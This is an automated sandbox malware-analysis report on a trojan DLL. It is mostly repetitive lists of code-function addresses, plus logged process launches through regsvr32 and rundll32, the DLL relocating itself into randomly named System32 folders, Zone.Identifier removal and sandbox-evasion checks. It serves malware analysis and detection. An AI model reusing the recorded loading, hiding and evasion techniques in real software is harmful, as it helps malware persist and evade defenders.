                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800141C02_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800125C42_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800121CC2_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BDD02_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800075D42_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800095DC2_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9E82_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800026102_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800196182_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FA382_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A2702_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019E782_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DA802_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800246982_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EE982_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800176B82_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AAB82_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011AD02_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008AD82_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800296EC2_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A6EC2_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800132F02_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800193002_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BB042_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002870C2_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180026B102_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000131C2_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000671C2_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029B282_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180012F282_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BB282_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB302_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800203342_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800107582_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001435C2_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009F5C2_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800293682_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800207682_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800173782_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800137802_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800153882_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000338C2_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000738C2_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800027902_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027F9C2_2_0000000180027F9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800197A02_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C7B42_2_000000018002C7B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DFB42_2_000000018001DFB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F7C02_2_000000018001F7C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800097C02_2_00000001800097C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800157D82_2_00000001800157D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019FDC2_2_0000000180019FDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017BDC2_2_0000000180017BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F7E02_2_000000018000F7E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001FE02_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010FF43_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C0583_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800091003_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C6083_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800216183_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E3AC3_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DBE83_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FC0C3_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000580C3_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800220103_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001481C3_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A42C3_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800118343_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021C3C3_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000703C3_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000AC483_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000FC483_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800064583_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C05C3_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001A4603_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800298883_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D49C3_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008CA03_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800248A83_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180015CB03_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800124B43_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C4B43_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800288B83_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800024B83_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000D8C43_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800250CC3_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800190D43_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017CE43_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800264F03_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800014F83_2_00000001800014F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020CFC3_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C9043_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800179083_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800215103_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F9173_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000551C3_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F1283_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CD383_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180016D3C3_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F9443_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800181483_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001ED503_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800131503_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D9503_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E9603_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019D603_2_0000000180019D60
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C9643_2_000000018001C964
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001D683_2_0000000180001D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001496C3_2_000000018001496C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180002D703_2_0000000180002D70
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800021783_2_0000000180002178
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180024D803_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800185983_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800035983_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A9A83_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800119A83_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180025DAC3_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180018DAC3_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800269B03_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800059B83_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800029BC3_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800141C03_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800125C43_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800121CC3_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800075D43_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800095DC3_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F9E83_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800026103_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800196183_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180013E283_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FA383_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A2703_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019E783_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DA803_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800246983_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000EE983_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800176B83_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AAB83_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180011AD03_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008AD83_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800296EC3_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A6EC3_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800132F03_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800193003_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BB043_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002870C3_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180026B103_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000131C3_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000671C3_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180029B283_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180012F283_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000BB283_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001EB303_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800203343_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800107583_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001435C3_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180009F5C3_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800293683_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800207683_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800173783_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800137803_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800153883_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000338C3_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000738C3_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800027903_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800197A03_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C7B43_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DFB43_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F7C03_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800097C03_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800157D83_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019FDC3_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017BDC3_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F7E03_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180001FE03_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000170926300003_2_0000017092630000
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180010FF44_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C0584_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800091004_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C6084_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800216184_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E3AC4_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DBE84_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FC0C4_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000580C4_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800220104_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001481C4_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A42C4_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800118344_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180021C3C4_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000703C4_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000AC484_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000FC484_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800064584_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C05C4_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001A4604_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800298884_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D49C4_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008CA04_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800248A84_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180015CB04_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800124B44_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C4B44_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800288B84_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800024B84_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000D8C44_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800250CC4_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800190D44_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exe  Section loaded: sfc.dll
                      Source: C:\Windows\System32\svchost.exe  Section loaded: windowscoredeviceinfo.dll
                      Source: x4ByCNJqst.dll  Virustotal: Detection: 38%
                      Source: x4ByCNJqst.dll  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exe  Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown  Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\x4ByCNJqst.dll"
                      Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1
                      Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\x4ByCNJqst.dll
                      Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1
                      Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllUnregisterServer
                      Source: C:\Windows\System32\regsvr32.exe  Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZqFjKrAb\CiXiSWjn.dll"
                      Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                      Source: C:\Windows\System32\regsvr32.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
                      Source: classification engine  Classification label: mal80.troj.evad.winDLL@19/0@0/1
                      Source: C:\Windows\System32\regsvr32.exe  File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 6_2_00000001800046A8 CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,
                      Source: C:\Windows\System32\svchost.exe  File read: C:\Windows\System32\drivers\etc\hosts
                      Source: x4ByCNJqst.dll  Static PE information: Image base 0x180000000 > 0x60000000
                      Source: x4ByCNJqst.dll  Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.743348166.0000000000C74000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.743348166.0000000000C74000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 2_2_000000018001AFFD push ebp; retf 2_2_000000018001AFFE
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 2_2_00000001800051D1 push ebp; iretd 2_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 2_2_000000018001BA32 push ebp; retf 2_2_000000018001BA33
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 2_2_0000000180004E83 push es; ret 2_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 2_2_000000018001B694 push es; ret 2_2_000000018001B6E9
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 2_2_000000018001BADD push ebp; iretd 2_2_000000018001BADE
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 2_2_000000018001B717 push ebp; iretd 2_2_000000018001B718
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 2_2_000000018001AF4E push ebp; retf 2_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 2_2_00000001800253BC pushfd ; retn 0057h 2_2_00000001800253BD
                      Source: C:\Windows\System32\rundll32.exe  Code function: 3_2_000000018001AFFD push ebp; retf 3_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exe  Code function: 3_2_00000001800051D1 push ebp; iretd 3_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exe  Code function: 3_2_000000018001BA32 push ebp; retf 3_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exe  Code function: 3_2_0000000180004E83 push es; ret 3_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exe  Code function: 3_2_000000018001B694 push es; ret 3_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exe  Code function: 3_2_000000018001BADD push ebp; iretd 3_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exe  Code function: 3_2_000000018001B717 push ebp; iretd 3_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exe  Code function: 3_2_0000000180007B3F push esp; retf 3_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exe  Code function: 3_2_000000018001AF4E push ebp; retf 3_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001AFFD push ebp; retf 4_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_00000001800051D1 push ebp; iretd 4_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001BA32 push ebp; retf 4_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_0000000180004E83 push es; ret 4_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001B694 push es; ret 4_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001BADD push ebp; iretd 4_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001B717 push ebp; iretd 4_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_0000000180007B3F push esp; retf 4_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001AF4E push ebp; retf 4_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 6_2_00000001800051D1 push ebp; iretd 6_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 6_2_0000000180004E83 push es; ret 6_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 6_2_0000000180007B3F push esp; retf 6_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exe  Code function: 2_2_00007FF8CA9B7BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,
                      Source: x4ByCNJqst.dll  Static PE information: real checksum: 0x85ab6 should be: 0x8b992
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\x4ByCNJqst.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\ZqFjKrAb\CiXiSWjn.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\ZqFjKrAb\CiXiSWjn.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\system32\BjWTKnjEmZvEAxR\DAQSugqx.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\system32\TQIlAvLfSGzEP\udKChXzXiH.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation
Source: C:\Windows\System32\svchost.exe TID: 2192 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4864 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_2-10063
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation
